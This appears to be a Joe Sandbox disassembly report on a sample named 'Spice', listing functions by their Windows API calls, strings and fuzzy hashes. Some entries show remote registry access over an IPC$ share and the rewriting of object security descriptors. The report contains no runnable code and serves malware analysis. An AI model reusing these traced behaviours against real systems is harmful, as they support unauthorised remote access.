Function 00EFC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EF982C,?,?), ref: 00EFC0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC0F7
GlobalLock.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC10F
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC118
CloseHandle.KERNEL32(00000000,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EF982C,?,?,00000000,?), ref: 00EFC130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F03C7C,?), ref: 00EFC149
GlobalFree.KERNEL32(00000000), ref: 00EFC159
GetObjectW.GDI32(00000000,00000018,?), ref: 00EFC17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EFC1A8
DeleteObject.GDI32(00000000), ref: 00EFC1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EFC1E6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: dc3baa0e81bca854fb5dc89f414e53a158ebe7922b4dfa9f8f8b0694a9f546f2
Instruction ID: 2c4cc08f4bfa9b8d70082567ef773e719d42d473f14142edd5f51994b3da1300
Opcode Fuzzy Hash: dc3baa0e81bca854fb5dc89f414e53a158ebe7922b4dfa9f8f8b0694a9f546f2
Instruction Fuzzy Hash: 2641397560120CEFDB219F64DD88EAA7BB9FF89715F204058FA05E7260DB309941EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDDEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00EDE053
_wcscat.LIBCMT ref: 00EDE06B
_wcscat.LIBCMT ref: 00EDE07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EDE092
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE0A6
GetFileAttributesW.KERNEL32(?), ref: 00EDE0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00EDE0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00EDE0EA

Strings

*.*, xrefs: 00EDE129

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: b79b62692bdff3eceefadad2a5683e646f1f578cf00df01bd4901ec58efba0dd
Instruction ID: e421c0d7188caa936395ef37cc216dd979e01a2787be236b461b4466adf28185
Opcode Fuzzy Hash: b79b62692bdff3eceefadad2a5683e646f1f578cf00df01bd4901ec58efba0dd
Instruction Fuzzy Hash: 7D8163716083459FCB24EF64C8449AAB7E8EF99314F14A82FF48AE7351E730D946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EFC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EFC8A4
GetFocus.USER32 ref: 00EFC8B4
GetDlgCtrlID.USER32(00000000), ref: 00EFC8BF
_memset.LIBCMT ref: 00EFC9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EFCA15
GetMenuItemCount.USER32(?), ref: 00EFCA35
GetMenuItemID.USER32(?,00000000), ref: 00EFCA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EFCA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EFCAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EFCAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EFCB31

Strings

0, xrefs: 00EFC9E2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: df1f3c23c19acf4f27c91fd09e26db41e4e0a1be40f51a2753ed08f431a5b6e8
Instruction ID: e8fc2de02b247831c5e842d759f494d5cd7ef9e0802392f3eba22488d0b8d885
Opcode Fuzzy Hash: df1f3c23c19acf4f27c91fd09e26db41e4e0a1be40f51a2753ed08f431a5b6e8
Instruction Fuzzy Hash: B2818D7020830D9FD720DF14CA85A7ABBE9FB88354F20591DFA99A3291D770D905DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
Part of subcall function 00EC8E20: GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
Part of subcall function 00EC8E20: GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
Part of subcall function 00EC8E20: HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
Part of subcall function 00EC8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73

Part of subcall function 00EC8EBD: GetProcessHeap.KERNEL32(00000008,00EC8916,00000000,00000000,?,00EC8916,?), ref: 00EC8EC9
Part of subcall function 00EC8EBD: HeapAlloc.KERNEL32(00000000,?,00EC8916,?), ref: 00EC8ED0
Part of subcall function 00EC8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EC8916,?), ref: 00EC8EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EC8B2E
_memset.LIBCMT ref: 00EC8B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EC8B62
GetLengthSid.ADVAPI32(?), ref: 00EC8B73
GetAce.ADVAPI32(?,00000000,?), ref: 00EC8BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EC8BCC
GetLengthSid.ADVAPI32(?), ref: 00EC8BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EC8BF8
HeapAlloc.KERNEL32(00000000), ref: 00EC8BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EC8C20
CopySid.ADVAPI32(00000000), ref: 00EC8C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EC8C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EC8C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EC8C92

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 3e75d1178a4957595abd1bb0069aaa7549dd693823d2e26165321ba82beb6898
Instruction ID: 3c5959cc345be6eedc1159558a431ac94ada8676ecdbd501426358a4a0c57d77
Opcode Fuzzy Hash: 3e75d1178a4957595abd1bb0069aaa7549dd693823d2e26165321ba82beb6898
Instruction Fuzzy Hash: 87614775900209AFDF10DFA4DF45FEEBBB9FF04304F04816AE915A6290DB369A06DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EE7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00EE7A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EE7A85
CreateCompatibleDC.GDI32(?), ref: 00EE7A91
SelectObject.GDI32(00000000,?), ref: 00EE7A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EE7AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE7B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EE7B52
SelectObject.GDI32(00000006,?), ref: 00EE7B5A
DeleteObject.GDI32(?), ref: 00EE7B63
DeleteDC.GDI32(00000006), ref: 00EE7B6A
ReleaseDC.USER32(00000000,?), ref: 00EE7B75

Strings

(, xrefs: 00EE7AFA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8848c5720291d9ca9c3abf71a1c8cd06d5a926a59c1b5d5945a44ffe6bcc898f
Instruction ID: 67043cfa6cc901d6c04b374662c29016d75a6e829ca4e70675bd659633e6acd4
Opcode Fuzzy Hash: 8848c5720291d9ca9c3abf71a1c8cd06d5a926a59c1b5d5945a44ffe6bcc898f
Instruction Fuzzy Hash: FD514B71904249EFDB14CFA9CC85FAEBBB9FF48310F14842DF999A7250D731A9419B60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EDA4D4

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00EDA4F6
__swprintf.LIBCMT ref: 00EDA54F
__swprintf.LIBCMT ref: 00EDA568
_wprintf.LIBCMT ref: 00EDA61E
_wprintf.LIBCMT ref: 00EDA63C

Strings

"%s" (%d) : ==> %s:, xrefs: 00EDA637
"%s" (%d) : ==> %s:%s%s, xrefs: 00EDA619
Error: , xrefs: 00EDA5E6
Line %d (File "%s"):, xrefs: 00EDA549, 00EDA562
^ ERROR, xrefs: 00EDA5C0

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 490e43b7052cc6fc8ee3bc56820b1bd0ba47b4d9ab44fc9687063205aaf6773a
Instruction ID: c4853d9d15bac18350b0cc98d09b4dc5e100de61a35680484384db9ecdfc1540
Opcode Fuzzy Hash: 490e43b7052cc6fc8ee3bc56820b1bd0ba47b4d9ab44fc9687063205aaf6773a
Instruction Fuzzy Hash: FE517F71800219AACF15FBA0DD46EEEB7BDEF04340F1411A6F509B21A2DB316F5ADB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED951A: __time64.LIBCMT ref: 00ED9524

Part of subcall function 00E84A8C: _fseek.LIBCMT ref: 00E84AA4

__wsplitpath.LIBCMT ref: 00ED97EF

Part of subcall function 00E9431E: __wsplitpath_helper.LIBCMT ref: 00E9435E

_wcscpy.LIBCMT ref: 00ED9802
_wcscat.LIBCMT ref: 00ED9815
__wsplitpath.LIBCMT ref: 00ED983A
_wcscat.LIBCMT ref: 00ED9850
_wcscat.LIBCMT ref: 00ED9863

Part of subcall function 00ED9560: _memmove.LIBCMT ref: 00ED9599
Part of subcall function 00ED9560: _memmove.LIBCMT ref: 00ED95A8

_wcscmp.LIBCMT ref: 00ED97AA

Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DE1
Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ED9A0D
_wcsncpy.LIBCMT ref: 00ED9A80
DeleteFileW.KERNEL32(?,?), ref: 00ED9AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00ED9ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED9ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00ED9AEF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 7d83bbdf502daa24dc936b30418d431450d7bdbd19c3b760a90c4ddc3f8adb18
Instruction ID: 7d36237aa1741dd7bb18972449a5307ed8afc13f55af109e507728a7d70723e6
Opcode Fuzzy Hash: 7d83bbdf502daa24dc936b30418d431450d7bdbd19c3b760a90c4ddc3f8adb18
Instruction Fuzzy Hash: 2EC13DB1900219AADF25DFA5CC85EDEB7BDEF45300F0050ABF609F6251EB309A858F65

Uniqueness

Uniqueness Score: -1.00%

Function 00E85BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E85BF1
GetMenuItemCount.USER32(00F37890), ref: 00EC0E7B
GetMenuItemCount.USER32(00F37890), ref: 00EC0F2B
GetCursorPos.USER32(?), ref: 00EC0F6F
SetForegroundWindow.USER32(00000000), ref: 00EC0F78
TrackPopupMenuEx.USER32(00F37890,00000000,?,00000000,00000000,00000000), ref: 00EC0F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EC0F97

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: c7a02066f76ddfb531c4c63807b79db9ecd7592dd563fc33a1e3bbb4927a3367
Instruction ID: 32f153690d57b6d65ae04f629e0e7ed93ca806479f4d42d3c29cd439410f6090
Opcode Fuzzy Hash: c7a02066f76ddfb531c4c63807b79db9ecd7592dd563fc33a1e3bbb4927a3367
Instruction Fuzzy Hash: 9371E271644619FFEB209B54CC85FAAFFA4FF44328F14121AF628762D1CBB26851DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

_memset.LIBCMT ref: 00EC8489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EC84BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EC84DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EC84F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EC8520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00EC8548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC8553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EC8558

Strings

\IPC$, xrefs: 00EC84A0
\CLSID, xrefs: 00EC8440
SOFTWARE\Classes\, xrefs: 00EC842A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: d1bf765f323623fa3e81bea7635dd6d6ab530fdd2156fb91842d8b51531c7d19
Instruction ID: 5613c98394336b43ee928aa24ea8ffc9b828eede372a798bb04192c7940427ed
Opcode Fuzzy Hash: d1bf765f323623fa3e81bea7635dd6d6ab530fdd2156fb91842d8b51531c7d19
Instruction Fuzzy Hash: 8E410672C1022DABCF15EBA4DD95EEEB7B8FF04340F045169E819B2161EB319E06DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491

Strings

HKEY_CURRENT_CONFIG, xrefs: 00EF154E
HKCC, xrefs: 00EF155F
HKCU, xrefs: 00EF1581
HKLM, xrefs: 00EF150F
HKEY_CLASSES_ROOT, xrefs: 00EF1524
HKEY_LOCAL_MACHINE, xrefs: 00EF14FA
HKCR, xrefs: 00EF1539
HKEY_CURRENT_USER, xrefs: 00EF1570
HKEY_USERS, xrefs: 00EF1592
HKU, xrefs: 00EF15A3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 4484c2f9b184188172b3f2677065950095b66edbe79c1fee78851bf85a0a818e
Instruction ID: babd819f75875c49ff07cae4a20545fc473f1b6f574436cd23a8df7e96f18a6d
Opcode Fuzzy Hash: 4484c2f9b184188172b3f2677065950095b66edbe79c1fee78851bf85a0a818e
Instruction Fuzzy Hash: 84414B3050426ECBDF04EF90E851AEE3764AF51304FA06495FD566B292DB30ED5ADBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Part of subcall function 00E8153B: _memmove.LIBCMT ref: 00E815C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED58EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED5901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED5912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED5924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED5935

Strings

close PlayMe, xrefs: 00ED58FC, 00ED5929
status PlayMe mode, xrefs: 00ED58E6
play PlayMe wait, xrefs: 00ED591F
open , xrefs: 00ED589A
play PlayMe, xrefs: 00ED5930
alias PlayMe, xrefs: 00ED58C4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 4d6c5811f9ac003c811312acc7903d51174503557314fcb6e3af91b29f01dc80
Instruction ID: 2d902af0f563874ecb60450ef9a061b802bd3e553a477fb212bc704d4a0d8951
Opcode Fuzzy Hash: 4d6c5811f9ac003c811312acc7903d51174503557314fcb6e3af91b29f01dc80
Instruction Fuzzy Hash: 4911B231950129B9E720F7A5EC5ADFF7BBCEBD1B50F40046AB819B20D0DE705D06C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00ED4C27
gethostname.WSOCK32(?,00000100), ref: 00ED4C41
gethostbyname.WSOCK32(?), ref: 00ED4C4E
_wcscpy.LIBCMT ref: 00ED4C76
_memmove.LIBCMT ref: 00ED4C89
inet_ntoa.WSOCK32(?), ref: 00ED4C94
_strcat.LIBCMT ref: 00ED4CA2
_wcscpy.LIBCMT ref: 00ED4CB9
WSACleanup.WSOCK32 ref: 00ED4CC7
_wcscpy.LIBCMT ref: 00ED4CD5

Strings

0.0.0.0, xrefs: 00ED4C70

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 4d740e6aa8fb04a3425c2e876fc423d5a9e1428623317d06e15112b824c17b72
Instruction ID: 9d76237c49fb0b5136f73c04539da4ee7f42478f6d0b3ae9c682e383ded901c3
Opcode Fuzzy Hash: 4d740e6aa8fb04a3425c2e876fc423d5a9e1428623317d06e15112b824c17b72
Instruction Fuzzy Hash: EC113671504118ABDF10B7609C4AEEAB7FCEF50710F0451AAF004B22D1EF719982DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00ED5535

Part of subcall function 00E90859: timeGetTime.WINMM(?,00000002,00E7C22C), ref: 00E9085D

Sleep.KERNEL32(0000000A), ref: 00ED5561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00ED5585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED55A7
